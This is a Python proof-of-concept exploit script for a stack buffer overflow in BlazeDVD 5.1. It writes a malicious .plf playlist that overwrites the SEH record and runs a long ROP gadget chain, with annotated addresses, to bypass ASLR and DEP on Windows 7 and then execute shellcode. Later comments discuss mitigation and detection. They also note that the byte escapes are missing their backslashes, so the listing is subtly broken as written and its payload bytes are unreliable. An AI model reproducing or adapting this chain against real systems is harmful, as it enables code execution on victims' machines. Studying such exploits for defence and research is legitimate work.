# Title : BlazeDVD v5.1 (.plf) Stack Buffer Overflow PoC Exploit - ALSR/DEP Bypass on Win7
# Published : 2010-06-17
# Author : mr_me
#!/usr/bin/python
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# BlazeDVD v5.1 (.plf) Stack Buffer Overflow PoC exploit - ASLR/DEP bypass on win7
# Author: mr_me - https://net-ninja.net - mr_me[AT]corelan.be - @StevenSeeley
# Download: http://www.blazevideo.com/
# Tested on windows 7 version N - DEP = AlwaysOn
# Greetz: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# Greetz to ryujin ! :P
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# This PoC demonstrates how we can bypass ASLR by stealing a
# pointer off the stack and calculating the offset.
# Then setup the VirtualProtect() call and execute it to bypass DEP as well.
# All addresses are from modules loaded with BlazeDVD that are not ASLR-protected.
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# write-up here: http://net-ninja.net/blog/?p=124
def banner():
    """Print the ASCII-art header followed by the PoC title line to stdout."""
    header_lines = (
        "|------------------------------------------------------------------|",
        "| __ __ |",
        "| _________ ________ / /___ _____ / /____ ____ _____ ___ |",
        "| / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__ |",
        "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |",
        "| ___/____/_/ ___/_/__,_/_/ /_/ __/___/__,_/_/ /_/ /_/ |",
        "| |",
        "|-------------------------------------------------[ EIP Hunters ]--|",
        "[+] BlazeDVD v5.1 (plf) Stack Buffer Overflow PoC exploit - ALSR/DEP bypass on win7",
    )
    # One-argument print() form prints the same text under Python 2 and 3.
    for text in header_lines:
        print(text)
# MessageBoxA - "mr_me defeats ASLR & DEP !"
# Payload string; it is the last component of `exploit` (see the concatenation
# near the end of the file). NOTE(review): every "xNN" token in this listing
# lacks the backslash of a "\xNN" escape, so as written the literal holds
# printable text rather than the byte values the author's comment describes.
sc = ("xbfx3ax13x11xddxd9xc8x33xc9xb1x4bxd9x74x24"
"xf4x5bx31x7bx14x83xebxfcx03x7bx10xd8xe6xc8"
"x36x87xd0x9fxecx43xd3x8dx5fxd1x25xfbxc4xae"
"x37xcbx8fxc6xbbxa0xe6x3ax4fxf0x0exc9x31xdd"
"x85xfbxf5x52x82x76xf5x34xb3xa9x06x27xd3xc2"
"x95x8cx30x5fx20xf1xb3x0bxaex71xc5x59x3bxcb"
"xddx16x66xecxdcxc3x74xdbx97x98x4fxafx29x70"
"x9ex50x18x4cx1dx02xdfx8cxaax51x21xc3x5ex67"
"x66x32x91x98x97x3bx69x1bx4cxebxfbx3dx07xb1"
"x27xc3xf3x23xa3xcfx48x20xe9xd3x4fxddx85xe8"
"xc4x20x72x79x9ex06x9ex1bxdcxf4x96xf2x36x71"
"x43x8dx75xe9x02xc0x77x05x48x35x1bx2ax92x3a"
"xadx91x69x7exd0xc1x90xf3xaaxedx70xa6x5cx86"
"x86xb9x62x11x3dx4exf5x4dxd2x6exfaxe5x19x5d"
"x2ax91x35xd4x41x3cxb4x9exfax9ax32x16xe4xb4"
"xbdx7dxedxb1x80x2ex56x69xa6x82x14xeexbbx38"
"x37x18x9dxbfx48x27x4ax2dxefxf7xabxc5x2fxa3"
"xcex74x58x39x78x03xe1xd5x29x8ex72x50xa6x3c"
"x14xf4x16xd5x95x67x25x40x2bxacx41xd6x6fx47"
"xdbx04x07x47xfax92xf8xefxdcx66xbcxbfx74x2b"
"x6cx1fxa3xdbxe3x7fxeax48x6cx19x89x0fx18x8d"
"x34xf0x84x28xdfx9dx36xedx72x6fx7ex99xc1xab"
"x9ax10x38x82x48x70xe8xb4x3ex8bxdex06x7fx23"
"x20x3dx77")
# Filler preceding the SEH record: `junk` (312 repetitions of 'x43') followed
# by `rop2`, which is padded with 'x44' so that len(junk) + len(rop2) == 612.
junk = 'x43' * 312
## This is where we land after our stack pivot ##
rop2 = 'xe7x57x60x61' # 0x616057E7 : # MOV AX,100 # RETN
rop2 += 'x41x41x41x41' # JUNK
rop2 += 'x9fxa5x62x61' * 73 # 0x6162A59F : # ADD EAX,20 # POP EBX # RETN
# Pad to the fixed offset. The subtraction uses the lengths of the literals as
# written; with the escape backslashes missing from this listing the term is
# negative, and Python's str * negative_int yields '' (no padding is added).
rop2 += 'x44' * (612-len(junk)-len(rop2))
# Overwritten SEH record; in `exploit` it sits directly after junk + rop2.
seh = 'xaex74x60x61' # 0x616074AE : # ADD ESP,408 # RETN 4
## leak ptr off the stack and calculate the offset for VirtualProtect() ##
# Gadget chain that follows `seh` in `exploit`. The per-gadget annotations are
# the author's. Every address lies in the 0x60xxxxxx / 0x61xxxxxx / 0x64xxxxxx
# ranges of modules the file header describes as loaded without ASLR, which is
# the property the whole chain depends on. Mitigation follows directly:
# linking those modules with ASLR support (/DYNAMICBASE) invalidates the fixed
# addresses, and the chain has no fallback for that case.
rop = 'x9fxa5x62x61' * 62 # 0x6162A59F : # ADD EAX,20 # POP EBX # RETN
rop += 'xf0x8dx62x61' * 2 # 0x61628DF0 : # ADD EAX,0c # RETN
rop += 'xe3xd8x01x64' # 0x6401D8E3 : # POP EDI # RETN
rop += 'x1bx10x10x64' # 0x6410101B : # POP ESI # RETN
rop += 'x3bxf9x60x61' # 0x6160F93B : # MOV EBX,EAX # CALL EDI
rop += 'x74x0cx32x60' # 0x60320C74 : # SUB EBP,EBX # OR ESI,ESI # RETN
rop += 'x27x7ex01x64' # 0x64017E27 : # XOR EAX,EAX # RETN
rop += 'xe1x67x01x64' # 0x640167E1 : # ADD EAX,EBP # RETN 2
rop += 'x4dxb2x10x64' # 0x6410B24D : # MOV EAX,DWORD PTR DS:[EAX] # RETN
rop += 'x41x41' # JUNK --------------------------^^
rop += 'x3exa0x10x64' # 0x6410A03E : # MOV EDX,EBX # JMP SHORT NetReg.6410A083 --> # PPR # RETN 10
rop += 'x41x41x41x41' # JUNK (for the p/p/r)
rop += 'x41x41x41x41' # JUNK (for the p/p/r)
rop += 'x05x6cx02x64' # 0x64026C05 : # SUB EAX,EDX # RETN
rop += 'x41x41x41x41' # JUNK ---------------------------------------------------------------^^
rop += 'x41x41x41x41' # JUNK
rop += 'x41x41x41x41' # JUNK
rop += 'x41x41x41x41' # JUNK
rop += 'x05x6cx02x64' * 14 # 0x64026C05 : # SUB EAX,EDX # RETN
rop += 'x24x41x60x61' * 88 # 0x61604124 : # ADD EAX,20 # RETN 4
rop += 'x41x41x41x41' # JUNK ------------------------^^
rop += 'x97x7dx03x64' * 6 # 0x64037D97 : # ADD EAX,-2 # RETN
## Setup the VirtualProtect() call ##
rop += 'xa2x8bx60x61' # 0x61608BA2 : # XCHG EAX,EDX # RETN
rop += 'x27x7ex01x64' # 0x64017E27 : # XOR EAX,EAX # RETN
rop += 'x59x9fx03x64' * 6 # 0x64039F59 : # ADD EAX,0C # RETN
rop += 'x97x7dx03x64' * 4 # 0x64037D97 : # ADD EAX,-2 # RETN
rop += 'xa2x8bx60x61' # 0x61608BA2 : # XCHG EAX,EDX # RETN
rop += 'x24x01x64x61' # 0x61640124 : # XCHG EAX,EBX # RETN
rop += 'x27x7ex01x64' # 0x64017E27 : # XOR EAX,EAX # RETN
## Calculate shellcode space ##
rop += 'x59x9fx03x64' * 65 # 0x64039F59 : # ADD EAX,0C # RETN
rop += 'x24x01x64x61' # 0x61640124 : # XCHG EAX,EBX # RETN
rop += 'xe3xd8x01x64' # 0x6401D8E3 : # POP EDI # RETN
rop += 'x1cx10x10x64' # 0x6410101C : # RETN (ROP NOP)
rop += 'x7exa9x60x61' # 0x6160A97E : # XCHG EAX,EBP # RETN
rop += 'x27x7ex01x64' # 0x64017E27 : # XOR EAX,EAX # RETN
rop += 'x74x58x02x64' # 0x64025874 : # PUSH ESP # POP ESI # RETN
rop += 'x60x8fx32x60' # 0x60328F60 : # MOV EAX,ESI # POP ESI # RETN 4
rop += 'x71x97x32x60' # 0x60329771 : # CALL EAX # JUNK --^^
rop += 'x59x9fx03x64' # 0x64039F59 : # ADD EAX,0C # RETN
rop += 'x41x41x41x41' # JUNK ------------------------------------^^
rop += 'x59x9fx03x64' * 5 # 0x64039F59 : # ADD EAX,0C # RETN
rop += 'xf1x2ax10x64' # 0x64102AF1 : # POP ECX # RETN
rop += 'x80xb1x11x64' # 0x6411b180 : # A writeable location from .data
rop += 'x7exa9x60x61' # 0x6160A97E : # XCHG EAX,EBP # RETN
rop += 'x07x40x63x61' # 0x61634007 : # XCHG EAX,ESI # AND EAX,C95E0000 # RETN 0C
# Last gadget of the chain; `nops` and then `sc` follow it in `exploit`.
rop += 'x31x08x62x61' # 0x61620831 : # PUSHAD # RETN
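# Padding run (the author's "nops") placed between the gadget chain and `sc`.
nops = "x90" * 30
# File layout: junk + rop2 (612 entries together), the SEH overwrite, the
# gadget chain, the padding run, then the payload string.
# Detection note: the resulting .plf is a long run of one repeated value
# followed by non-playlist data, which is the observable artifact of this PoC.
exploit = junk + rop2 + seh + rop + nops + sc
# `with` guarantees the handle is closed even if write() raises, and avoids
# binding the handle to the name `file` (a Python 2 builtin). Text mode 'w'
# is kept exactly as before so the written content is unchanged.
with open('cst-blazedvd.plf', 'w') as out:
    out.write(exploit)
# Report success only after the write completed; the message names the
# extension actually written (.plf).
print("[+] cst-blazedvd.plf exploit file created!")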